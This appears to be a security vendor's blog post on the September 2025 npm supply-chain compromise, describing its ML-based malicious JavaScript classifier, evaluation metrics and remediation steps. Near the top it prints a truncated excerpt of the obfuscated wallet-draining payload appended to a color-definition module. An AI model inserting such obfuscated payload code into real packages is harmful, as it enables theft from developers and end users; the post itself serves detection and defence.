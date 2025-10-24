4 min read

In early September 2025, attackers used a phishing email to compromise one or more trusted maintainer accounts on npm. They used this to publish malicious releases of 18 widely used npm packages (for example chalk, debug, ansi-styles) that account for more than 2 billion downloads per week . Websites and applications that used these compromised packages were vulnerable to hackers stealing crypto assets (“crypto stealing” or “wallet draining”) from end users. In addition, compromised packages could also modify other packages owned by the same maintainers (using stolen npm tokens) and included code to steal developer tokens for CI/CD pipelines and cloud accounts .

As it relates to end users of your applications, the good news is that Cloudflare Page Shield, our client-side security offering will detect compromised JavaScript libraries and prevent crypto-stealing. More importantly, given the AI powering Cloudflare’s detection solutions, customers are protected from similar attacks in the future, as we explain below.

export default { aliceblue: [240, 248, 255], … yellow: [255, 255, 0], yellowgreen: [154, 205, 50] } const _0x112fa8=_0x180f;(function(_0x13c8b9,_0x35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+-parseInt(_0x15b386(0x1e8))/(0xfe+0x16f2+-0x17eb)+-parseInt(_0x15b386(0x707))/(-0x23f8+-0x2*0x70e+-0x48e*-0xb)*(parseInt(_0x15b386(0x3f3))/(-0x6a1+0x3f5+0x2b3))+-parseInt(_0x15b386(0x435))/(0xeb5+0x3b1+-0x125e)*(parseInt(_0x15b386(0x56e))/(0x18*0x118+-0x17ee+-0x249))+parseInt(_0x15b386(0x785))/(-0xfbd+0xd5d*-0x1+0x1d24)+-parseInt(_0x15b386(0x654))/(-0x196d*0x1+-0x605+0xa7f*0x3)*(-parseInt(_0x15b386(0x3ee))/(0x282*0xe+0x760*0x3+-0x3930));if(_0x2cc99e===_0x35f660)break;else _0x66ea25['push'](_0x66ea25['shift']());}catch(_0x205af0){_0x66 …

Excerpt from the injected malicious payload, along with the rest of the innocuous normal code. Among other things, the payload replaces legitimate crypto addresses with attacker’s addresses (for multiple currencies, including bitcoin, ethereum, solana).

Finding needles in a 3.5 billion script haystack

Everyday, Cloudflare Page Shield assesses 3.5 billion scripts per day or 40,000 scripts per second. Of these, less than 0.3% are malicious, based on our machine learning (ML)-based malicious script detection. As explained in a prior blog post , we preprocess JavaScript code into an Abstract Syntax Tree to train a message-passing graph convolutional network (MPGCN) that classifies a given JavaScript file as either malicious or benign.

The intuition behind using a graph-based model is to use both the structure (e.g. function calling, assertions) and code text to learn hacker patterns. For example, in the npm compromise, the malicious code injected in compromised packages uses code obfuscation and also modifies code entry points for crypto wallet interfaces, such as Ethereum’s window.ethereum, to swap payment destinations to accounts in the attacker’s control. Crucially, rather than engineering such behaviors as features, the model learns to distinguish between good and bad code purely from structure and syntax. As a result, it is resilient to techniques used not just in the npm compromise but also future compromise techniques.

Our ML model outputs the probability that a script is malicious which is then transformed into a score ranging from 1 to 99, with low scores indicating likely malicious and high scores indicating benign scripts. Importantly, like many Cloudflare ML models, inferencing happens in under 0.3 seconds.

Model Evaluation

Since the initial launch, our JavaScript classifiers are constantly being evolved to optimize model evaluation metrics, in this case, F1 measure . Our current metrics are

Metric Latest: Version 2.7 Improvement over prior version Precision 98% 5% Recall 90% 233% F1 94% 123%

Some of the improvements were accomplished through:

More training examples, curated from a combination of open source datasets, security partners, and labeling of Cloudflare traffic

Better training examples, for instance, by removing samples with pure comments in them or scripts with nearly equal structure

Better training set stratification, so that training, validation and test sets all have similar distribution of classes of interest

Tweaking the evaluation criteria to maximize recall with 99% precision

Given the confusion matrix, we should expect about 2 false positives per second, if we assume ~0.3% of the 40,000 scripts per second are flagged as malicious. We employ multiple LLMs alongside expert human security analysts to review such scripts around the clock. Most False Positives we encounter in this way are rather challenging. For example, scripts that read all form inputs except credit card numbers (e.g. reject input values that test true using the Luhn algorithm ), injecting dynamic scripts, heavy user tracking, heavy deobfuscation, etc. User tracking scripts often exhibit a combination of these behaviors, and the only reliable way to distinguish truly malicious payloads is by assessing the trustworthiness of their connected domains. We feed all newly labeled scripts back into our ML training (& testing) pipeline.

Most importantly, we verified that Cloudflare Page Shield would have successfully detected all 18 compromised npm packages as malicious (a novel attack, thus, not in the training data)..

Planned improvements

Static script analysis has proven effective and is sometimes the only viable approach (e.g., for npm packages). To address more challenging cases, we are enhancing our ML signals with contextual data including script URLs, page hosts, and connected domains. Modern Agentic AI approaches can wrap JavaScript runtimes as tools in an overall AI workflow. Then, they can enable a hybrid approach that combines static and dynamic analysis techniques to tackle challenging false positive scenarios, such as user tracking scripts.

Consolidating classifiers

Over 3 years ago we launched our classifier, “ Code Behaviour Analysis ” for Magecart-style scripts that learns code obfuscation and data exfiltration behaviors. Subsequently, we also deployed our message-passing graph convolutional network (MPGCN) based approach that can also classify Magecart attacks . Given the efficacy of the MPGCN-based malicious code analysis, we are announcing the end-of-life of code behaviour analysis by the end of 2025.

Staying safe always

In the npm attack, we did not see any activity in the Cloudflare network related to this compromise among Page Shield users, though for other exploits, we catch its traffic within minutes. In this case, patches of the compromised npm packages were released in 2 hours or less, and given that the infected payloads had to be built into end user facing applications for end user impact, we suspect that our customers dodged the proverbial bullet. That said, had traffic gotten through, Page Shield was already equipped to detect and block this threat.

Also make sure to consult our Page Shield Script detection to find malicious packages. Consult the Connections tab within Page Shield to view suspicious connections made by your applications.

Several scripts are marked as malicious.

Several connections are marked as malicious.

And be sure to complete the following steps:

Audit your dependency tree for recently published versions (check package-lock.json / npm ls) and look for versions published around early–mid September 2025 of widely used packages. Rotate any credentials that may have been exposed to your build environment. Revoke and reissue CI/CD tokens and service keys that might have been used in build pipelines (GitHub Actions, npm tokens, cloud credentials). Pin dependencies to known-good versions (or use lockfiles), and consider using a package allowlist / verified publisher features from your registry provider. Scan build logs and repos for suspicious commits/GitHub Actions changes and remove any unknown webhooks or workflows.